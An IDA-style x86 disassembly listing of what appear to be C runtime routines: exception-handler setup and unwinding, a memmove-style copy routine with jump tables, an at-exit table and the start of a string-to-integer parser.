fld [ebp+var_8]
fcomp [ebp+arg_0]
pop ecx
pop ecx
fnstsw ax
sahf
jnz short loc_41603C
loc_41602E: ; CODE XREF: sub_415F93+AC�j
push esi
push ebx
call sub_41A89D
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_41605E
; ---------------------------------------------------------------------------
loc_41603C: ; CODE XREF: sub_415F93+99�j
test bl, 20h
jnz short loc_41602E
fld [ebp+var_8]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
fld [ebp+arg_0]
push ecx
push ecx ; double
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_416056: ; CODE XREF: sub_415F93+84�j
call sub_41A0C8
add esp, 1Ch
loc_41605E: ; CODE XREF: sub_415F93+59�j
; sub_415F93+67�j ...
pop esi
pop ebx
leave
retn
sub_415F93 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416062 proc near ; CODE XREF: sub_41B1C5+71�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ebx, large fs:0
mov eax, [ebx]
mov large fs:0, eax
mov eax, [ebp+arg_0]
mov ebx, [ebp+arg_4]
mov esp, [ebx-4]
mov ebp, [ebp+var_4]
jmp eax
sub_416062 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 8
; =============== S U B R O U T I N E =======================================
sub_416096 proc near ; CODE XREF: sub_41B376+199�p
; sub_41B53A+3E�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_416096 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41609D proc near ; CODE XREF: sub_41B376+17F�p
arg_4 = dword ptr 8
pop eax
pop ecx
xchg eax, [esp-8+arg_4]
jmp eax
sub_41609D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4160A4 proc near ; CODE XREF: sub_416256+5C�p
; sub_41B1C5:loc_41B1F6�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov eax, large fs:0
mov [ebp+var_8], eax
mov [ebp+var_4], offset loc_4160CC
push 0
push [ebp+arg_4]
push [ebp+var_4]
push [ebp+arg_0]
call sub_420B66 ; RtlUnwind
loc_4160CC: ; DATA XREF: sub_4160A4+11�o
mov eax, [ebp+arg_4]
mov eax, [eax+4]
and al, 0FDh
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, large fs:0
mov ebx, [ebp+var_8]
mov [ebx], eax
mov large fs:0, ebx
pop edi
pop esi
pop ebx
leave
retn 8
sub_4160A4 endp
; ---------------------------------------------------------------------------
loc_4160F3: ; CODE XREF: _0:00421208�j _0:00421225�j ...
push ebp
mov ebp, esp
sub esp, 4
push ebx
push esi
push edi
cld
mov [ebp-4], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-4]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_41ADCA
add esp, 20h
mov [ebp+14h], eax
pop edi
pop esi
pop ebx
mov eax, [ebp+14h]
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416129 proc near ; CODE XREF: sub_41B240+73�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
mov [ebp+var_10], offset sub_41617D
inc eax
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_41B5D0
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_416129 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41617D proc near ; DATA XREF: sub_416129+16�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cld
mov eax, [ebp+arg_4]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_41ADCA
add esp, 20h
pop ebp
retn
sub_41617D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4161A2 proc near ; CODE XREF: sub_41B00C+25�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_416256
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_416228
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call ds:dword_4C9108
pop ecx
pop ecx
and [ebp+var_34], 0
loc_416228: ; DATA XREF: sub_4161A2+3C�o
cmp [ebp+var_4], 0
jz short loc_416245
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_41624E
; ---------------------------------------------------------------------------
loc_416245: ; CODE XREF: sub_4161A2+8A�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_41624E: ; CODE XREF: sub_4161A2+A1�j
mov eax, [ebp+var_34]
pop edi
pop esi
pop ebx
leave
retn
sub_4161A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416256 proc near ; DATA XREF: sub_4161A2+D�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_416279
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
push 1
pop eax
jmp short loc_4162C6
; ---------------------------------------------------------------------------
loc_416279: ; CODE XREF: sub_416256+12�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_41ADCA
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_4162B7
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4160A4
loc_4162B7: ; CODE XREF: sub_416256+54�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
push 1
pop eax
loc_4162C6: ; CODE XREF: sub_416256+21�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_416256 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4162CB proc near ; CODE XREF: sub_41AE65+C6�p
; sub_41B00C+43�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
cmp [ebp+arg_4], 0
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+arg_0], esi
mov [ebp+var_4], eax
jl short loc_416322
loc_4162E9: ; CODE XREF: sub_4162CB+52�j
cmp esi, 0FFFFFFFFh
jnz short loc_4162F3
call sub_41B672
loc_4162F3: ; CODE XREF: sub_4162CB+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
cmp [ebx+eax*4+4], ecx
lea eax, [ebx+eax*4]
jge short loc_416308
cmp ecx, [eax+8]
jle short loc_41630D
loc_416308: ; CODE XREF: sub_4162CB+36�j
cmp esi, 0FFFFFFFFh
jnz short loc_416319
loc_41630D: ; CODE XREF: sub_4162CB+3B�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_416319: ; CODE XREF: sub_4162CB+40�j
cmp [ebp+arg_4], 0
jge short loc_4162E9
mov eax, [ebp+var_4]
loc_416322: ; CODE XREF: sub_4162CB+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_416336
cmp esi, eax
jbe short loc_41633B
loc_416336: ; CODE XREF: sub_4162CB+65�j
call sub_41B672
loc_41633B: ; CODE XREF: sub_4162CB+69�j
lea eax, [esi+esi*4]
pop edi
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_4162CB endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416348 proc near ; CODE XREF: sub_41D894+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_416360
push [ebp+arg_0]
call sub_420B66 ; RtlUnwind
loc_416360: ; DATA XREF: sub_416348+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_416348 endp
; =============== S U B R O U T I N E =======================================
sub_416368 proc near ; DATA XREF: sub_41638A+A�o
; sub_4163F2+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_416389
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_416389: ; CODE XREF: sub_416368+10�j
retn
sub_416368 endp
; =============== S U B R O U T I N E =======================================
sub_41638A proc near ; CODE XREF: sub_41B2E6+D�p
; sub_41D894+67�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_416368
push large dword ptr fs:0
mov large fs:0, esp
loc_4163A7: ; CODE XREF: sub_41638A:loc_4163E2�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_4163E4
cmp esi, [esp+1Ch+arg_4]
jz short loc_4163E4
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_4163E2
push 101h
mov eax, [ebx+esi*4+8]
call sub_41641E
call dword ptr [ebx+esi*4+8]
loc_4163E2: ; CODE XREF: sub_41638A+44�j
jmp short loc_4163A7
; ---------------------------------------------------------------------------
loc_4163E4: ; CODE XREF: sub_41638A+2A�j
; sub_41638A+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_41638A endp
; =============== S U B R O U T I N E =======================================
sub_4163F2 proc near ; CODE XREF: sub_41B306+37�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_416368
jnz short locret_416414
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_416414
mov eax, 1
locret_416414: ; CODE XREF: sub_4163F2+10�j
; sub_4163F2+1B�j
retn
sub_4163F2 endp
; =============== S U B R O U T I N E =======================================
sub_416415 proc near ; CODE XREF: sub_41B5D0+1E�p
; sub_41B5D0+40�p
push ebx
push ecx
mov ebx, offset dword_42F33C
jmp short loc_416428
sub_416415 endp
; =============== S U B R O U T I N E =======================================
sub_41641E proc near ; CODE XREF: sub_41638A+4F�p
; sub_41D894+78�p
push ebx
push ecx
mov ebx, offset dword_42F33C
mov ecx, [ebp+8]
loc_416428: ; CODE XREF: sub_416415+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_41641E endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_416438 proc near ; CODE XREF: sub_4031FF+5�p
; sub_4033A1+5�p ...
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_416438 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416457 proc near ; CODE XREF: sub_403834+26�p
; _0:00420902�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_415DE1
pop ecx
retn
sub_416457 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416470 proc near ; CODE XREF: sub_4038A5+3A�p
; sub_418ED4+2EF�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_416490
cmp edi, eax
jb loc_416608
loc_416490: ; CODE XREF: sub_416470+16�j
test edi, 3
jnz short loc_4164AC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4164CC
rep movsd
jmp off_4165B8[edx*4]
; ---------------------------------------------------------------------------
loc_4164AC: ; CODE XREF: sub_416470+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4164C4
and eax, 3
add ecx, eax
jmp dword ptr loc_4164CC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4164C4: ; CODE XREF: sub_416470+46�j
jmp dword ptr loc_4165C8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4164CC: ; CODE XREF: sub_416470+31�j
; sub_416470+8E�j ...
jmp off_41654C[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4164E0
dd offset loc_41650C
dd offset loc_416530
; ---------------------------------------------------------------------------
loc_4164E0: ; DATA XREF: sub_416470+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4164CC
rep movsd
jmp off_4165B8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41650C: ; DATA XREF: sub_416470+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4164CC
rep movsd
jmp off_4165B8[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_416530: ; DATA XREF: sub_416470+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4164CC
rep movsd
jmp off_4165B8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41654C dd offset loc_4165AF ; DATA XREF: sub_416470:loc_4164CC�r
dd offset loc_41659C
dd offset loc_416594
dd offset loc_41658C
dd offset loc_416584
dd offset loc_41657C
dd offset loc_416574
dd offset loc_41656C
; ---------------------------------------------------------------------------
loc_41656C: ; CODE XREF: sub_416470:loc_4164CC�j
; DATA XREF: sub_416470+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_416574: ; CODE XREF: sub_416470:loc_4164CC�j
; DATA XREF: sub_416470+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41657C: ; CODE XREF: sub_416470:loc_4164CC�j
; DATA XREF: sub_416470+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_416584: ; CODE XREF: sub_416470:loc_4164CC�j
; DATA XREF: sub_416470+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41658C: ; CODE XREF: sub_416470:loc_4164CC�j
; DATA XREF: sub_416470+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_416594: ; CODE XREF: sub_416470:loc_4164CC�j
; DATA XREF: sub_416470+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41659C: ; CODE XREF: sub_416470:loc_4164CC�j
; DATA XREF: sub_416470+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4165AF: ; CODE XREF: sub_416470:loc_4164CC�j
; DATA XREF: sub_416470:off_41654C�o
jmp off_4165B8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4165B8 dd offset loc_4165C8 ; DATA XREF: sub_416470+35�r
; sub_416470+92�r ...
dd offset loc_4165D0
dd offset loc_4165DC
dd offset loc_4165F0
; ---------------------------------------------------------------------------
loc_4165C8: ; CODE XREF: sub_416470+35�j
; sub_416470+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4165D0: ; CODE XREF: sub_416470+35�j
; sub_416470+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4165DC: ; CODE XREF: sub_416470+35�j
; sub_416470+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4165F0: ; CODE XREF: sub_416470+35�j
; sub_416470+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_416608: ; CODE XREF: sub_416470+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_41663C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_416630
std
rep movsd
cld
jmp off_416750[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_416630: ; CODE XREF: sub_416470+1B1�j
; sub_416470+208�j ...
neg ecx
jmp off_416700[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41663C: ; CODE XREF: sub_416470+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_416654
and eax, 3
sub ecx, eax
jmp dword ptr loc_416654+4[eax*4]
; ---------------------------------------------------------------------------
loc_416654: ; CODE XREF: sub_416470+1D6�j
; DATA XREF: sub_416470+1DD�r
jmp off_416750[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_416667+1
dd offset loc_416688
; ---------------------------------------------------------------------------
mov al, 66h
inc ecx
loc_416667: ; DATA XREF: sub_416470+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_416630
std
rep movsd
cld
jmp off_416750[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_416688: ; DATA XREF: sub_416470+1F0�o
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_416630
std
rep movsd
cld
jmp off_416750[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_416630
std
rep movsd
cld
jmp off_416750[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_416704
dd offset loc_41670C
dd offset loc_416714
dd offset loc_41671C
dd offset loc_416724
dd offset loc_41672C
dd offset loc_416734
off_416700 dd offset loc_416747 ; DATA XREF: sub_416470+1C2�r
; ---------------------------------------------------------------------------
loc_416704: ; DATA XREF: sub_416470+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41670C: ; DATA XREF: sub_416470+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_416714: ; DATA XREF: sub_416470+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41671C: ; DATA XREF: sub_416470+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_416724: ; DATA XREF: sub_416470+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_41672C: ; DATA XREF: sub_416470+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_416734: ; DATA XREF: sub_416470+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_416747: ; CODE XREF: sub_416470+1C2�j
; DATA XREF: sub_416470:off_416700�o
jmp off_416750[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_416750 dd offset loc_416760 ; DATA XREF: sub_416470+1B7�r
; sub_416470:loc_416654�r ...
dd offset loc_416768
dd offset loc_416778
dd offset loc_41678C
; ---------------------------------------------------------------------------
loc_416760: ; CODE XREF: sub_416470+1B7�j
; sub_416470:loc_416654�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_416768: ; CODE XREF: sub_416470+1B7�j
; sub_416470:loc_416654�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_416778: ; CODE XREF: sub_416470+1B7�j
; sub_416470:loc_416654�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41678C: ; CODE XREF: sub_416470+1B7�j
; sub_416470:loc_416654�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_416470 endp
; =============== S U B R O U T I N E =======================================
sub_4167A5 proc near ; CODE XREF: sub_40390C+34�p
; sub_40390C+4F�p ...
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call sub_415D41
pop ecx
pop ecx
retn
sub_4167A5 endp
; =============== S U B R O U T I N E =======================================
sub_4167B3 proc near ; CODE XREF: sub_416820+4�p
arg_0 = dword ptr 4
push esi
push ds:dword_4CA71C
call sub_41B6C8
mov edx, ds:dword_4CA71C
pop ecx
mov ecx, ds:dword_4CA718
mov esi, ecx
sub esi, edx
add esi, 4
cmp eax, esi
pop esi
jnb short loc_416812
push edx
call sub_41B6C8
add eax, 10h
push eax
push ds:dword_4CA71C
call sub_41756F
add esp, 0Ch
test eax, eax
jnz short loc_4167F5
retn
; ---------------------------------------------------------------------------
loc_4167F5: ; CODE XREF: sub_4167B3+3F�j
mov ecx, ds:dword_4CA718
sub ecx, ds:dword_4CA71C
mov ds:dword_4CA71C, eax
sar ecx, 2
lea ecx, [eax+ecx*4]
mov ds:dword_4CA718, ecx
loc_416812: ; CODE XREF: sub_4167B3+23�j
mov eax, [esp+arg_0]
mov [ecx], eax
add ds:dword_4CA718, 4
retn
sub_4167B3 endp
; =============== S U B R O U T I N E =======================================
sub_416820 proc near ; CODE XREF: sub_4039F9+1A�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_4167B3
neg eax
sbb eax, eax
pop ecx
neg eax
dec eax
retn
sub_416820 endp
; =============== S U B R O U T I N E =======================================
sub_416832 proc near ; DATA XREF: _2:00424010�o
push 80h
call sub_415D2F
test eax, eax
pop ecx
mov ds:dword_4CA71C, eax
jnz short loc_416853
push 18h
call sub_417DFA
mov eax, ds:dword_4CA71C
pop ecx
loc_416853: ; CODE XREF: sub_416832+12�j
and dword ptr [eax], 0
mov eax, ds:dword_4CA71C
mov ds:dword_4CA718, eax
retn
sub_416832 endp
; =============== S U B R O U T I N E =======================================
sub_416861 proc near ; CODE XREF: sub_418CBC+11B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_416878
add esp, 10h
retn
sub_416861 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416878 proc near ; CODE XREF: sub_416861+E�p
; sub_416A80+E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
and [ebp+var_8], 0
push esi
push edi
mov edi, [ebp+arg_0]
mov bl, [edi]
lea esi, [edi+1]
mov [ebp+var_4], esi
loc_416890: ; CODE XREF: sub_416878+46�j
cmp ds:dword_42F56C, 1
jle short loc_4168A8
movzx eax, bl
push 8
push eax
call sub_418762
pop ecx
pop ecx
jmp short loc_4168B7
; ---------------------------------------------------------------------------
loc_4168A8: ; CODE XREF: sub_416878+1F�j
mov ecx, ds:off_42F360
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 8
loc_4168B7: ; CODE XREF: sub_416878+2E�j
test eax, eax
jz short loc_4168C0
mov bl, [esi]
inc esi
jmp short loc_416890
; ---------------------------------------------------------------------------
loc_4168C0: ; CODE XREF: sub_416878+41�j
cmp bl, 2Dh
mov [ebp+var_4], esi
jnz short loc_4168CE
or [ebp+arg_C], 2
jmp short loc_4168D3
; ---------------------------------------------------------------------------
loc_4168CE: ; CODE XREF: sub_416878+4E�j
cmp bl, 2Bh
jnz short loc_4168D9
loc_4168D3: ; CODE XREF: sub_416878+54�j
mov bl, [esi]
inc esi
mov [ebp+var_4], esi
loc_4168D9: ; CODE XREF: sub_416878+59�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_416A70
cmp eax, 1
jz loc_416A70
cmp eax, 24h
jg loc_416A70
push 10h
test eax, eax
pop ecx
jnz short loc_416921
cmp bl, 30h
jz short loc_41690B
mov [ebp+arg_8], 0Ah
jmp short loc_41693D
; ---------------------------------------------------------------------------
loc_41690B: ; CODE XREF: sub_416878+88�j
mov al, [esi]
cmp al, 78h
jz short loc_41691E
cmp al, 58h
jz short loc_41691E
mov [ebp+arg_8], 8
jmp short loc_41693D
; ---------------------------------------------------------------------------
loc_41691E: ; CODE XREF: sub_416878+97�j
; sub_416878+9B�j
mov [ebp+arg_8], ecx
loc_416921: ; CODE XREF: sub_416878+83�j
cmp [ebp+arg_8], ecx
jnz short loc_41693D
cmp bl, 30h
jnz short loc_41693D
mov al, [esi]
cmp al, 78h
jz short loc_416935
cmp al, 58h
jnz short loc_41693D
loc_416935: ; CODE XREF: sub_416878+B7�j
mov bl, [esi+1]
inc esi
inc esi
mov [ebp+var_4], esi
loc_41693D: ; CODE XREF: sub_416878+91�j
; sub_416878+A4�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
mov edi, 103h
mov [ebp+var_C], eax
loc_41694D: ; CODE XREF: sub_416878+16C�j
cmp ds:dword_42F56C, 1
movzx esi, bl
jle short loc_416965
push 4
push esi
call sub_418762
pop ecx
pop ecx
jmp short loc_416970
; ---------------------------------------------------------------------------
loc_416965: ; CODE XREF: sub_416878+DF�j
mov eax, ds:off_42F360
mov al, [eax+esi*2]
and eax, 4
loc_416970: ; CODE XREF: sub_416878+EB�j
test eax, eax
jz short loc_41697C
movsx ecx, bl
sub ecx, 30h
jmp short loc_4169AE
; ---------------------------------------------------------------------------
loc_41697C: ; CODE XREF: sub_416878+FA�j
cmp ds:dword_42F56C, 1
jle short loc_416990
push edi
push esi
call sub_418762
pop ecx
pop ecx
